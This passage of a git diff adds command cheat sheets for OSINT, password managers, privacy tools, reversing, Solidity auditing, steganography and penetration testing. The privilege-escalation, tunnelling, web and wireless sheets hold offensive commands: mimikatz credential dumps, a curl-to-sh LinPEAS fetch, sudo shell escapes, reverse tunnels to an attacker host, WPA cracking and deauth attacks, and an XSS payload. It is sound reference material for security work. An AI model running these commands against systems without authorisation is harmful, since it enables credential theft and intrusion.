+# Google dorking - site specific
+# site:<domain> filetype:pdf
+
+# Google dorking - login pages
+# site:<domain> inurl:login OR inurl:admin
+
+# Google dorking - exposed files
+# site:<domain> filetype:sql OR filetype:env OR filetype:log
+
+# Wayback machine URLs
+waybackurls <domain>
+
+# GitHub dorking - secrets
+# org:<company> password OR api_key OR secret
+
+# Shodan - host info
+shodan host <ip>
+
+# Shodan - search
+shodan search "hostname:<domain>"
+
+# Shodan - org search
+shodan search 'org:"<company_name>"'
+
+# Email verification
+curl "https://api.hunter.io/v2/email-verifier?email=<email>&api_key=<api_key>"
+
+# SpiderFoot scan
+spiderfoot -s <target> -o output.html
+
+# Recon-ng
+recon-ng
+# Then: marketplace install all
+# workspaces create <name>
+# modules load recon/domains-hosts/hackertarget
+
+# Social media - Instagram OSINT
+# instaloader <username>
+
+# Image reverse search
+# Google Images, TinEye, Yandex
+
+# Metadata extraction
+exiftool <image>
+
+# GPS from image
+exiftool -gpslatitude -gpslongitude <image>
+
+# Check if email is breached
+# haveibeenpwned.com API or dehashed.com
+
+$ username: echo ""
+$ domain: echo ""
+$ ip: echo ""
+$ nameserver: echo ""
+$ company_name: echo ""
+$ email: echo ""
+$ api_key: echo ""
+$ target: echo ""
+$ image: find . -name "*.jpg" -o -name "*.png" 2>/dev/null | head -5
diff --git a/pass.cheat b/pass.cheat
new file mode 100644
index 0000000..6a7b0c0
--- /dev/null
+++ b/pass.cheat
@@ -0,0 +1,134 @@
+% pass, password-manager, gpg, keepass
+
+# Initialize password store
+pass init <gpg_key_id>
+
+# Initialize with git
+pass git init
+
+# List all passwords
+pass
+
+# List passwords in folder
+pass <folder>
+
+# Show password
+pass <entry>
+
+# Show password (clipboard, 45 sec)
+pass -c <entry>
+
+# Generate new password
+pass generate <entry> <length>
+
+# Generate without symbols
+pass generate -n <entry> <length>
+
+# Generate and copy to clipboard
+pass generate -c <entry> <length>
+
+# Insert password manually
+pass insert <entry>
+
+# Insert multiline
+pass insert -m <entry>
+
+# Edit password
+pass edit <entry>
+
+# Remove password
+pass rm <entry>
+
+# Move/rename password
+pass mv <old_entry> <new_entry>
+
+# Copy password entry
+pass cp <entry> <new_entry>
+
+# Find password
+pass find <search_term>
+
+# Search in passwords
+pass grep <search_term>
+
+# Git push changes
+pass git push
+
+# Git pull changes
+pass git pull
+
+# Git status
+pass git status
+
+# Import from KeePass
+pass import keepass <kdbx_file>
+
+# Export to KeePass (manual or script)
+# pass show <entry> and import to KeePass
+
+# KeePassXC CLI - open database
+keepassxc-cli open <database>
+
+# KeePassXC CLI - list entries
+keepassxc-cli ls <database>
+
+# KeePassXC CLI - show entry
+keepassxc-cli show <database> <entry>
+
+# KeePassXC CLI - show password only
+keepassxc-cli show -s <database> <entry>
+
+# KeePassXC CLI - add entry
+keepassxc-cli add <database> <entry>
+
+# KeePassXC CLI - generate password
+keepassxc-cli generate -L <length>
+
+# KeePassXC CLI - clip password
+keepassxc-cli clip <database> <entry>
+
+# Bitwarden CLI - login
+bw login
+
+# Bitwarden CLI - unlock
+bw unlock
+
+# Bitwarden CLI - list items
+bw list items
+
+# Bitwarden CLI - get password
+bw get password <item_id>
+
+# Bitwarden CLI - create item
+bw create item <json_data>
+
+# Bitwarden CLI - sync
+bw sync
+
+# gopass (pass compatible with teams)
+gopass
+
+# gopass - init with multiple keys
+gopass init <key1> <key2>
+
+# gopass - recipient add
+gopass recipients add <gpg_key_id>
+
+# Rofi integration (pass menu)
+rofi-pass
+
+# Dmenu integration
+passmenu
+
+# Browser integration
+# browserpass extension + browserpass-native
+
+$ gpg_key_id: gpg --list-keys --keyid-format SHORT 2>/dev/null | grep -E "^pub" | awk '{print $2}' | cut -d'/' -f2
+$ entry: pass 2>/dev/null | grep -v "Password Store" | sed 's/[├│└──]//g' | tr -d ' ' | grep -v '^$'
+$ folder: pass 2>/dev/null | grep -v "Password Store" | grep "/" | head -5 | sed 's/[├│└──]//g' | tr -d ' '
+$ length: echo "20\n32\n64"
+$ old_entry: pass 2>/dev/null | grep -v "Password Store" | sed 's/[├│└──]//g' | tr -d ' ' | grep -v '^$'
+$ new_entry: echo ""
+$ search_term: echo ""
+$ kdbx_file: find ~ -name "*.kdbx" 2>/dev/null | head -5
+$ database: find ~ -name "*.kdbx" 2>/dev/null | head -5
diff --git a/privacy.cheat b/privacy.cheat
new file mode 100644
index 0000000..bffbc26
--- /dev/null
+++ b/privacy.cheat
@@ -0,0 +1,128 @@
+% privacy, encryption, tor, gpg, pets
+
+# Generate GPG key pair
+gpg --full-generate-key
+
+# List GPG keys
+gpg --list-keys
+
+# List secret keys
+gpg --list-secret-keys
+
+# Export public key
+gpg --armor --export <key_id> > public.asc
+
+# Export private key (backup)
+gpg --armor --export-secret-keys <key_id> > private.asc
+
+# Import a key
+gpg --import <keyfile>
+
+# Encrypt file with GPG (symmetric)
+gpg -c <file>
+
+# Encrypt file for recipient
+gpg -e -r <recipient_email> <file>
+
+# Decrypt GPG file
+gpg -d <file.gpg> > <output_file>
+
+# Sign a file
+gpg --sign <file>
+
+# Verify signature
+gpg --verify <file.sig>
+
+# Age encryption - generate key
+age-keygen -o key.txt
+
+# Age encrypt file
+age -r <public_key> -o <file.age> <file>
+
+# Age decrypt file
+age -d -i key.txt -o <output> <file.age>
+
+# Age encrypt with passphrase
+age -p -o <file.age> <file>
+
+# Start Tor service
+sudo systemctl start tor
+
+# Check Tor status
+sudo systemctl status tor
+
+# Torify a command
+torify <command>
+
+# Use torsocks
+torsocks curl https://check.torproject.org
+
+# Get new Tor circuit
+sudo killall -HUP tor
+
+# Check if using Tor
+curl --socks5 localhost:9050 https://check.torproject.org/api/ip
+
+# I2P - start router
+i2prouter start
+
+# I2P - check status
+i2prouter status
+
+# Secure delete file (shred)
+shred -vfz -n 5 <file>
+
+# Secure delete with srm
+srm -vz <file>
+
+# Wipe free space
+sfill -v <mountpoint>
+
+# BleachBit clean
+bleachbit --clean system.cache system.tmp
+
+# Veracrypt create volume
+veracrypt -t -c
+
+# Veracrypt mount volume
+veracrypt <volume_file> <mount_point>
+
+# Veracrypt dismount
+veracrypt -d <mount_point>
+
+# Check for listening services
+ss -tulpn
+
+# Block all incoming (UFW)
+sudo ufw default deny incoming && sudo ufw enable
+
+# MAC address randomization
+sudo macchanger -r <interface>
+
+# Reset MAC to permanent
+sudo macchanger -p <interface>
+
+# DNS over HTTPS test
+curl -H 'accept: application/dns-json' 'https://cloudflare-dns.com/dns-query?name=example.com&type=A'
+
+# Check DNS leaks
+curl https://dnsleaktest.com/
+
+# Metadata removal from image
+exiftool -all= <image>
+
+# Metadata removal from PDF
+exiftool -all:all= <pdf>
+
+# MAT2 metadata removal
+mat2 <file>
+
+# Check what metadata exists
+exiftool <file>
+
+$ key_id: gpg --list-keys --keyid-format SHORT 2>/dev/null | grep -E "^pub" | awk '{print $2}' | cut -d'/' -f2
+$ recipient_email: echo ""
+$ file: find . -type f -maxdepth 1 2>/dev/null | head -20
+$ interface: ip link show | grep -E "^[0-9]" | cut -d: -f2 | tr -d ' ' | grep -v lo
+$ mount_point: echo "/mnt/veracrypt"
+$ public_key: echo "age1..."
diff --git a/privesc-linux.cheat b/privesc-linux.cheat
new file mode 100644
index 0000000..1110df9
--- /dev/null
+++ b/privesc-linux.cheat
@@ -0,0 +1,71 @@
+% privesc, linux, escalation
+
+# Find SUID binaries
+find / -perm -4000 -type f 2>/dev/null
+
+# Find SGID binaries
+find / -perm -2000 -type f 2>/dev/null
+
+# Check sudo permissions
+sudo -l
+
+# Find writable directories
+find / -writable -type d 2>/dev/null
+
+# Find world-writable files
+find / -perm -o+w -type f 2>/dev/null
+
+# Check cron jobs
+cat /etc/crontab
+ls -la /etc/cron*
+crontab -l
+
+# Find capabilities
+getcap -r / 2>/dev/null
+
+# Check for docker group
+id | grep docker
+
+# Check kernel version (for exploits)
+uname -a
+
+# Check OS version
+cat /etc/os-release
+
+# LinPEAS
+curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
+
+# LinEnum
+./LinEnum.sh -t
+
+# Check passwd file writable
+ls -la /etc/passwd
+
+# Check shadow file readable
+ls -la /etc/shadow
+
+# Find password files
+find / -name "*.txt" -exec grep -l "password" {} \; 2>/dev/null
+
+# Check NFS exports (no_root_squash)
+cat /etc/exports
+
+# Find SSH keys
+find / -name "id_rsa" 2>/dev/null
+find / -name "authorized_keys" 2>/dev/null
+
+# Check PATH hijacking
+echo $PATH
+ls -la /usr/local/bin
+
+# GTFOBins sudo bypass - vim
+sudo vim -c ':!/bin/sh'
+
+# GTFOBins sudo bypass - find
+sudo find . -exec /bin/sh \; -quit
+
+# GTFOBins sudo bypass - awk
+sudo awk 'BEGIN {system("/bin/sh")}'
+
+# GTFOBins SUID - python
+./python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
diff --git a/privesc-windows.cheat b/privesc-windows.cheat
new file mode 100644
index 0000000..80a88bc
--- /dev/null
+++ b/privesc-windows.cheat
@@ -0,0 +1,83 @@
+% privesc, windows, escalation
+
+# System info
+systeminfo
+
+# Current user privileges
+whoami /priv
+
+# Current user groups
+whoami /groups
+
+# All users
+net user
+
+# User details
+net user <username>
+
+# Local groups
+net localgroup
+
+# Administrators group
+net localgroup administrators
+
+# Running services
+wmic service list brief
+
+# Installed patches
+wmic qfe list
+
+# Scheduled tasks
+schtasks /query /fo LIST /v
+
+# Find unquoted service paths
+wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\"
+
+# Find writable service directories
+icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
+
+# AlwaysInstallElevated check
+reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
+reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
+
+# Stored credentials
+cmdkey /list
+
+# SAM and SYSTEM backup
+dir C:\Windows\Repair\SAM
+dir C:\Windows\System32\config\RegBack\SAM
+
+# PowerUp
+Import-Module .\PowerUp.ps1; Invoke-AllChecks
+
+# WinPEAS
+.\winPEASany.exe
+
+# Juicy Potato (SeImpersonate)
+.\JuicyPotato.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c c:\shell.exe" -t *
+
+# PrintSpoofer (SeImpersonate)
+.\PrintSpoofer.exe -i -c cmd
+
+# GodPotato (SeImpersonate)
+.\GodPotato.exe -cmd "cmd /c whoami"
+
+# Search for passwords in files
+findstr /si password *.txt *.ini *.config
+
+# Search registry for passwords
+reg query HKLM /f password /t REG_SZ /s
+reg query HKCU /f password /t REG_SZ /s
+
+# Check saved WiFi passwords
+netsh wlan show profiles
+netsh wlan show profile name="<wifi_name>" key=clear
+
+# Dump SAM with mimikatz
+mimikatz.exe "privilege::debug" "lsadump::sam" "exit"
+
+# Dump credentials with mimikatz
+mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
+
+$ username: echo ""
+$ wifi_name: echo ""
diff --git a/reversing.cheat b/reversing.cheat
new file mode 100644
index 0000000..ac2acb0
--- /dev/null
+++ b/reversing.cheat
@@ -0,0 +1,127 @@
+% reversing, reverse-engineering, ghidra, radare2, gdb, binary
+
+# Ghidra - start GUI
+ghidraRun
+
+# Ghidra - analyze headless
+analyzeHeadless <project_dir> <project_name> -import <binary> -postScript <script>
+
+# radare2 - open binary
+r2 <binary>
+
+# radare2 - analyze all
+r2 -A <binary>
+
+# radare2 - analyze and open
+r2 -AA <binary>
+
+# r2 commands (inside r2):
+# aaa     - analyze all
+# afl     - list functions
+# pdf     - print disassembly of function
+# s main  - seek to main
+# VV      - visual graph mode
+# px 100  - print hex
+# iz      - list strings in data section
+# ii      - list imports
+# ie      - list entry points
+
+# radare2 - list functions
+r2 -qc 'aaa; afl' <binary>
+
+# radare2 - list strings
+r2 -qc 'iz' <binary>
+
+# radare2 - disassemble main
+r2 -qc 'aaa; s main; pdf' <binary>
+
+# GDB - start debugging
+gdb <binary>
+
+# GDB - run with args
+gdb --args <binary> <arg1> <arg2>
+
+# GDB commands:
+# r           - run
+# b main      - breakpoint at main
+# b *0x401000 - breakpoint at address
+# c           - continue
+# n           - next (step over)
+# s           - step (step into)
+# p $eax      - print register
+# x/10x $esp  - examine memory
+# info reg    - show registers
+# disas       - disassemble current function
+# bt          - backtrace
+# q           - quit
+
+# GDB with pwndbg/gef (enhanced)
+gdb -q <binary>
+
+# objdump - disassemble
+objdump -d <binary>
+
+# objdump - all headers
+objdump -x <binary>
+
+# objdump - disassemble with source
+objdump -S <binary>
+
+# readelf - file header
+readelf -h <binary>
+
+# readelf - sections
+readelf -S <binary>
+
+# readelf - symbols
+readelf -s <binary>
+
+# readelf - program headers
+readelf -l <binary>
+
+# nm - list symbols
+nm <binary>
+
+# nm - dynamic symbols
+nm -D <binary>
+
+# strings - extract strings
+strings <binary>
+strings -n 10 <binary>
+
+# file - identify binary type
+file <binary>
+
+# ldd - list shared libraries
+ldd <binary>
+
+# strace - trace syscalls
+strace <binary>
+strace -f <binary>
+
+# ltrace - trace library calls
+ltrace <binary>
+
+# Cutter - r2 GUI
+cutter <binary>
+
+# Binary Ninja (commercial)
+binaryninja <binary>
+
+# IDA Free
+ida64 <binary>
+
+# checksec - binary protections
+checksec --file=<binary>
+
+# ROPgadget - find gadgets
+ROPgadget --binary <binary>
+
+# pwntools (Python)
+# from pwn import *
+# elf = ELF('<binary>')
+
+$ binary: find . -type f -executable 2>/dev/null | head -10
+$ project_dir: echo "/tmp/ghidra_projects"
+$ project_name: echo "analysis"
+$ script: echo ""
diff --git a/secure-comms.cheat b/secure-comms.cheat
new file mode 100644
index 0000000..c3c4067
--- /dev/null
+++ b/secure-comms.cheat
@@ -0,0 +1,129 @@
+% comms, signal, matrix, encrypted, messaging
+
+# Signal CLI - register
+signal-cli -u <phone_number> register
+
+# Signal CLI - verify
+signal-cli -u <phone_number> verify <code>
+
+# Signal CLI - send message
+signal-cli -u <phone_number> send -m "<message>" <recipient>
+
+# Signal CLI - send to group
+signal-cli -u <phone_number> send -m "<message>" -g <group_id>
+
+# Signal CLI - receive messages
+signal-cli -u <phone_number> receive
+
+# Signal CLI - list groups
+signal-cli -u <phone_number> listGroups
+
+# Signal CLI - create group
+signal-cli -u <phone_number> createGroup -n "<group_name>" -m <member1> <member2>
+
+# Signal CLI - daemon mode
+signal-cli -u <phone_number> daemon
+
+# Matrix - login with element-cli
+element-cli login <homeserver> <username> <password>
+
+# Matrix - send message (Python SDK)
+# pip install matrix-nio
+# See nio documentation
+
+# Matrix CLI - gomuks (TUI client)
+gomuks
+
+# Matrix CLI - matrixcli
+matrixcli -s <homeserver> -u <username> send <room_id> "<message>"
+
+# SimpleX Chat - start
+simplex-chat
+
+# Briar - desktop
+briar-desktop
+
+# Session messenger
+session-desktop
+
+# Keybase - login
+keybase login
+
+# Keybase - send message
+keybase chat send <username> "<message>"
+
+# Keybase - encrypt file
+keybase encrypt <username> -i <input_file> -o <output_file>
+
+# Keybase - decrypt file
+keybase decrypt -i <input_file> -o <output_file>
+
+# Keybase - sign file
+keybase sign -i <input_file> -o <output_file.sig>
+
+# Keybase - verify signature
+keybase verify -i <file.sig>
+
+# GPG - encrypt for recipient
+gpg -e -r <recipient> <file>
+
+# GPG - sign and encrypt
+gpg -se -r <recipient> <file>
+
+# GPG - decrypt
+gpg -d <file.gpg>
+
+# age - encrypt for recipient
+age -r <public_key> -o <output.age> <input_file>
+
+# age - encrypt with passphrase
+age -p -o <output.age> <input_file>
+
+# age - decrypt
+age -d -i <key_file> -o <output> <input.age>
+
+# OnionShare - share files over Tor
+onionshare-cli <file>
+
+# OnionShare - receive files
+onionshare-cli --receive
+
+# OnionShare - chat
+onionshare-cli --chat
+
+# Magic Wormhole - send file
+wormhole send <file>
+
+# Magic Wormhole - receive
+wormhole receive <code>
+
+# Croc - send file
+croc send <file>
+
+# Croc - receive
+croc <code>
+
+# XMPP with profanity
+profanity
+
+# IRC with weechat (+ OTR)
+weechat
+
+# Ricochet Refresh (Tor messenger)
+ricochet-refresh
+
+$ phone_number: echo "+1234567890"
+$ recipient: echo "+1234567890"
+$ code: echo ""
+$ message: echo ""
+$ group_id: echo ""
+$ group_name: echo ""
+$ homeserver: echo "https://matrix.org"
+$ username: echo ""
+$ password: echo ""
+$ room_id: echo ""
+$ public_key: echo "age1..."
+$ key_file: echo "key.txt"
+$ input_file: find . -type f 2>/dev/null | head -10
+$ output_file: echo "encrypted"
+$ file: find . -type f 2>/dev/null | head -10
diff --git a/solidity.cheat b/solidity.cheat
new file mode 100644
index 0000000..a090da5
--- /dev/null
+++ b/solidity.cheat
@@ -0,0 +1,129 @@
+% solidity, audit, smartcontract, ethereum, foundry
+
+# Foundry - create new project
+forge init <project_name>
+
+# Foundry - build/compile
+forge build
+
+# Foundry - run tests
+forge test
+
+# Foundry - run tests verbose
+forge test -vvvv
+
+# Foundry - run specific test
+forge test --match-test <test_name>
+
+# Foundry - gas report
+forge test --gas-report
+
+# Foundry - coverage
+forge coverage
+
+# Foundry - deploy contract
+forge create <contract> --rpc-url <rpc_url> --private-key <private_key>
+
+# Foundry - verify contract
+forge verify-contract <address> <contract> --chain <chain_id>
+
+# Cast - call read function
+cast call <contract_address> "<function_sig>" --rpc-url <rpc_url>
+
+# Cast - send transaction
+cast send <contract_address> "<function_sig>" --rpc-url <rpc_url> --private-key <private_key>
+
+# Cast - decode calldata
+cast calldata-decode "<function_sig>" <calldata>
+
+# Cast - get storage slot
+cast storage <contract_address> <slot> --rpc-url <rpc_url>
+
+# Cast - keccak256 hash
+cast keccak "<text>"
+
+# Cast - convert to wei
+cast to-wei <amount> ether
+
+# Cast - convert from wei
+cast from-wei <amount>
+
+# Slither - full analysis
+slither <contract_or_dir>
+
+# Slither - specific detectors
+slither <contract> --detect <detector>
+
+# Slither - print contract summary
+slither <contract> --print contract-summary
+
+# Slither - print function summary
+slither <contract> --print function-summary
+
+# Slither - print inheritance
+slither <contract> --print inheritance-graph
+
+# Slither - human summary
+slither <contract> --print human-summary
+
+# Slither - list detectors
+slither --list-detectors
+
+# Mythril - analyze contract
+myth analyze <contract.sol>
+
+# Mythril - analyze deployed contract
+myth analyze --address <contract_address> --rpc <rpc_url>
+
+# Mythril - execution timeout
+myth analyze <contract.sol> --execution-timeout 300
+
+# Echidna - fuzz testing
+echidna <contract.sol> --contract <contract_name>
+
+# Echidna - with config
+echidna <contract.sol> --contract <contract_name> --config echidna.yaml
+
+# Aderyn - static analysis (Rust-based, fast)
+aderyn <contract_or_dir>
+
+# Solhint - linter
+solhint <contract.sol>
+
+# Solhint - init config
+solhint --init
+
+# Common vulnerability patterns to check:
+# - Reentrancy (external calls before state changes)
+# - Integer overflow/underflow (pre-0.8.0)
+# - Unchecked return values
+# - Access control issues
+# - Front-running susceptibility
+# - Oracle manipulation
+# - Flash loan attacks
+# - Delegate call to untrusted contract
+
+# Check for selfdestruct
+grep -rn "selfdestruct\|suicide" <dir>
+
+# Check for delegatecall
+grep -rn "delegatecall" <dir>
+
+# Check for tx.origin
+grep -rn "tx.origin" <dir>
+
+# Check for inline assembly
+grep -rn "assembly" <dir>
+
+$ project_name: echo "my_project"
+$ contract: find . -name "*.sol" 2>/dev/null | head -10
+$ contract_or_dir: echo "."
+$ contract_address: echo "0x..."
+$ rpc_url: echo "https://eth-mainnet.g.alchemy.com/v2/YOUR_KEY"
+$ private_key: echo ""
+$ function_sig: echo "balanceOf(address)"
+$ test_name: echo "test"
+$ detector: echo "reentrancy-eth\nreentrancy-no-eth\narbitrary-send\nsuicide\nuninitialized-storage"
+$ chain_id: echo "1\n5\n137\n42161" --- --header "1=mainnet, 5=goerli, 137=polygon, 42161=arbitrum"
+$ slot: echo "0"
+$ dir: echo "src/"
diff --git a/steganography.cheat b/steganography.cheat
new file mode 100644
index 0000000..6b7d7ce
--- /dev/null
+++ b/steganography.cheat
@@ -0,0 +1,117 @@
+% steganography, stego, hidden, ctf
+
+# steghide - extract hidden data
+steghide extract -sf <image>
+
+# steghide - extract with password
+steghide extract -sf <image> -p <password>
+
+# steghide - embed data
+steghide embed -cf <cover_image> -ef <secret_file>
+
+# steghide - info about file
+steghide info <image>
+
+# stegseek - crack steghide password
+stegseek <image> <wordlist>
+
+# stegseek - without wordlist (rockyou default)
+stegseek <image>
+
+# zsteg - PNG/BMP analysis
+zsteg <image>
+
+# zsteg - all checks
+zsteg -a <image>
+
+# binwalk - scan for embedded files
+binwalk <file>
+
+# binwalk - extract embedded files
+binwalk -e <file>
+
+# binwalk - extract with matryoshka
+binwalk -eM <file>
+
+# foremost - file carving
+foremost -i <file> -o <output_dir>
+
+# exiftool - view all metadata
+exiftool <file>
+
+# exiftool - view specific tag
+exiftool -Comment <file>
+
+# strings - find hidden text
+strings <file>
+strings -n 10 <file>
+
+# xxd - hex dump
+xxd <file> | head -50
+
+# Check file magic bytes
+xxd -l 16 <file>
+file <file>
+
+# pngcheck - PNG structure
+pngcheck -v <image>
+
+# stegoveritas - multiple stego checks
+stegoveritas <image>
+
+# openstego - extract (GUI tool)
+openstego extract -sf <image> -xd <output_dir>
+
+# outguess - extract
+outguess -r <image> <output_file>
+
+# jsteg - JPEG steganography
+jsteg reveal <image>
+
+# Audio steganography - Audacity
+# Open in Audacity, check spectrogram view
+
+# Audio steganography - sonic-visualiser
+sonic-visualiser <audio_file>
+
+# LSB extraction with Python
+# from PIL import Image
+# img = Image.open('image.png')
+# Extract least significant bits
+
+# Check for appended data
+# Compare file size to expected size
+# Look for data after EOF marker
+
+# SNOW - whitespace steganography
+snow -C <text_file>
+
+# stegsnow - extract from whitespace
+stegsnow -C <text_file>
+
+# PDF steganography - check streams
+pdf-parser <pdf_file>
+pdftotext <pdf_file>
+
+# QR code extraction
+zbarimg <image>
+
+# Common CTF stego workflow:
+# 1. file / xxd - identify type
+# 2. exiftool - check metadata
+# 3. strings - hidden text
+# 4. binwalk - embedded files
+# 5. steghide/stegseek - hidden data
+# 6. zsteg - LSB for PNG
+
+$ image: find . -name "*.jpg" -o -name "*.png" -o -name "*.bmp" 2>/dev/null | head -10
+$ file: find . -type f 2>/dev/null | head -10
+$ cover_image: find . -name "*.jpg" 2>/dev/null | head -5
+$ secret_file: echo "secret.txt"
+$ password: echo ""
+$ wordlist: echo "/usr/share/wordlists/rockyou.txt"
+$ output_dir: echo "extracted"
+$ output_file: echo "output.txt"
+$ text_file: find . -name "*.txt" 2>/dev/null | head -5
+$ audio_file: find . -name "*.wav" -o -name "*.mp3" 2>/dev/null | head -5
+$ pdf_file: find . -name "*.pdf" 2>/dev/null | head -5
diff --git a/tunnels.cheat b/tunnels.cheat
new file mode 100644
index 0000000..d5ca676
--- /dev/null
+++ b/tunnels.cheat
@@ -0,0 +1,114 @@
+% tunnels, ssh, pivoting, portforward, proxy
+
+# SSH local port forward
+ssh -L <local_port>:<target_host>:<target_port> <user>@<jump_host>
+
+# SSH remote port forward
+ssh -R <remote_port>:<local_host>:<local_port> <user>@<remote_host>
+
+# SSH dynamic SOCKS proxy
+ssh -D <socks_port> <user>@<host>
+
+# SSH with ProxyJump (bastion)
+ssh -J <user>@<jump_host> <user>@<target_host>
+
+# SSH tunnel background
+ssh -fN -L <local_port>:<target_host>:<target_port> <user>@<jump_host>
+
+# SSH reverse tunnel (callback)
+ssh -fN -R <remote_port>:localhost:22 <user>@<attacker_host>
+
+# Chisel server (on attacker)
+chisel server -p <port> --reverse
+
+# Chisel client reverse SOCKS
+chisel client <attacker_ip>:<port> R:socks
+
+# Chisel client port forward
+chisel client <attacker_ip>:<port> R:<remote_port>:<target_host>:<target_port>
+
+# Chisel client local forward
+chisel client <server_ip>:<port> <local_port>:<target_host>:<target_port>
+
+# Ligolo-ng proxy (attacker)
+./proxy -selfcert
+
+# Ligolo-ng agent (victim)
+./agent -connect <attacker_ip>:11601 -ignore-cert
+
+# Socat port forward
+socat TCP-LISTEN:<local_port>,fork TCP:<target_host>:<target_port>
+
+# Socat file transfer
+# Receiver:
+socat TCP-LISTEN:<port>,fork file:<output_file>,create
+# Sender:
+socat TCP:<target>:<port> file:<input_file>
+
+# Netcat relay
+nc -lvp <port1> | nc <target> <port2>
+
+# Proxychains with nmap
+proxychains nmap -sT -Pn <target>
+
+# Proxychains any command
+proxychains <command>
+
+# Edit proxychains config
+# /etc/proxychains4.conf
+# socks5 127.0.0.1 1080
+
+# WireGuard - generate keys
+wg genkey | tee privatekey | wg pubkey > publickey
+
+# WireGuard - quick up
+wg-quick up <interface>
+
+# WireGuard - quick down
+wg-quick down <interface>
+
+# WireGuard - show status
+wg show
+
+# sshuttle - VPN over SSH
+sshuttle -r <user>@<host> <network_cidr>
+
+# sshuttle - all traffic
+sshuttle -r <user>@<host> 0/0
+
+# Metasploit portfwd
+# portfwd add -l <local> -p <remote_port> -r <target>
+
+# Meterpreter autoroute
+# run autoroute -s <subnet>
+
+# plink (Windows SSH)
+plink.exe -L <local_port>:<target>:<target_port> <user>@<host>
+
+# netsh port forward (Windows)
+netsh interface portproxy add v4tov4 listenport=<local_port> listenaddress=0.0.0.0 connectport=<target_port> connectaddress=<target_host>
+
+# netsh show forwards
+netsh interface portproxy show all
+
+# netsh delete forward
+netsh interface portproxy delete v4tov4 listenport=<local_port> listenaddress=0.0.0.0
+
+$ local_port: echo "8080"
+$ target_host: echo ""
+$ target_port: echo "80"
+$ user: echo ""
+$ jump_host: echo ""
+$ remote_host: echo ""
+$ remote_port: echo "9999"
+$ local_host: echo "127.0.0.1"
+$ socks_port: echo "1080"
+$ host: echo ""
+$ attacker_ip: echo ""
+$ attacker_host: echo ""
+$ port: echo "8080"
+$ server_ip: echo ""
+$ network_cidr: echo "10.0.0.0/24"
+$ interface: echo "wg0"
+$ output_file: echo "received_file"
+$ input_file: find . -type f 2>/dev/null | head -5
diff --git a/web.cheat b/web.cheat
new file mode 100644
index 0000000..74a892c
--- /dev/null
+++ b/web.cheat
@@ -0,0 +1,59 @@
+% web, webapp, burp, fuzzing
+
+# Directory fuzzing with ffuf
+ffuf -u http://<target>/FUZZ -w <wordlist>
+
+# Directory fuzzing with extensions
+ffuf -u http://<target>/FUZZ -w <wordlist> -e .php,.html,.txt,.bak
+
+# Subdomain fuzzing
+ffuf -u http://FUZZ.<domain> -w <wordlist> -H "Host: FUZZ.<domain>"
+
+# POST parameter fuzzing
+ffuf -u http://<target>/login -X POST -d "username=admin&password=FUZZ" -w <wordlist>
+
+# Filter by status code
+ffuf -u http://<target>/FUZZ -w <wordlist> -fc 404
+
+# Filter by response size
+ffuf -u http://<target>/FUZZ -w <wordlist> -fs 0
+
+# Gobuster directory scan
+gobuster dir -u http://<target> -w <wordlist>
+
+# Gobuster with extensions
+gobuster dir -u http://<target> -w <wordlist> -x php,html,txt
+
+# Nikto scan
+nikto -h http://<target>
+
+# WhatWeb (technology detection)
+whatweb http://<target>
+
+# SQLMap basic
+sqlmap -u "http://<target>/page.php?id=1" --batch
+
+# SQLMap dump database
+sqlmap -u "http://<target>/page.php?id=1" --dbs --batch
+
+# SQLMap dump tables
+sqlmap -u "http://<target>/page.php?id=1" -D <database> --tables --batch
+
+# XSS test payload
+<script>alert('XSS')</script>
+
+# Curl with POST data
+curl -X POST http://<target>/login -d "username=admin&password=test" -v
+
+# Curl with cookies
+curl http://<target> -b "session=<cookie>"
+
+# Curl with headers
+curl http://<target> -H "Authorization: Bearer <token>"
+
+$ target: echo ""
+$ domain: echo ""
+$ wordlist: echo "/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt"
+$ database: echo ""
+$ cookie: echo ""
+$ token: echo ""
diff --git a/wireless.cheat b/wireless.cheat
new file mode 100644
index 0000000..927ede9
--- /dev/null
+++ b/wireless.cheat
@@ -0,0 +1,89 @@
+% wireless, wifi, aircrack, wpa, hacking
+
+# Check wireless interfaces
+iwconfig
+
+# Kill interfering processes
+sudo airmon-ng check kill
+
+# Start monitor mode
+sudo airmon-ng start <interface>
+
+# Stop monitor mode
+sudo airmon-ng stop <monitor_interface>
+
+# Scan for networks
+sudo airodump-ng <monitor_interface>
+
+# Target specific network (capture handshake)
+sudo airodump-ng -c <channel> --bssid <bssid> -w <output_prefix> <monitor_interface>
+
+# Deauth attack (force handshake)
+sudo aireplay-ng -0 <count> -a <bssid> -c <client_mac> <monitor_interface>
+
+# Deauth broadcast (all clients)
+sudo aireplay-ng -0 <count> -a <bssid> <monitor_interface>
+
+# Crack WPA/WPA2 handshake
+aircrack-ng -w <wordlist> -b <bssid> <capture_file>
+
+# Crack with hashcat (faster - convert first)
+cap2hccapx <capture_file> output.hccapx
+hashcat -m 22000 output.hccapx <wordlist>
+
+# PMKID attack (no handshake needed)
+sudo hcxdumptool -i <monitor_interface> -o pmkid.pcapng --enable_status=1
+
+# Convert PMKID for hashcat
+hcxpcapngtool -o hash.22000 pmkid.pcapng
+hashcat -m 22000 hash.22000 <wordlist>
+
+# Fake AP with hostapd-wpe
+sudo hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
+
+# WPS attack with reaver
+sudo reaver -i <monitor_interface> -b <bssid> -vv
+
+# WPS attack with bully
+sudo bully -b <bssid> -c <channel> <monitor_interface>
+
+# Pixie dust attack (WPS)
+sudo reaver -i <monitor_interface> -b <bssid> -vv -K 1
+
+# Wifite - automated attacks
+sudo wifite
+
+# Wifite - WPA only
+sudo wifite --wpa
+
+# Check if handshake captured
+aircrack-ng <capture_file>
+
+# Create wordlist from AP info
+crunch 8 8 -t <ssid>%%%% -o custom_wordlist.txt
+
+# Wash - find WPS enabled APs
+sudo wash -i <monitor_interface>
+
+# Fern WiFi Cracker (GUI)
+sudo fern-wifi-cracker
+
+# Kismet - wireless detection
+kismet
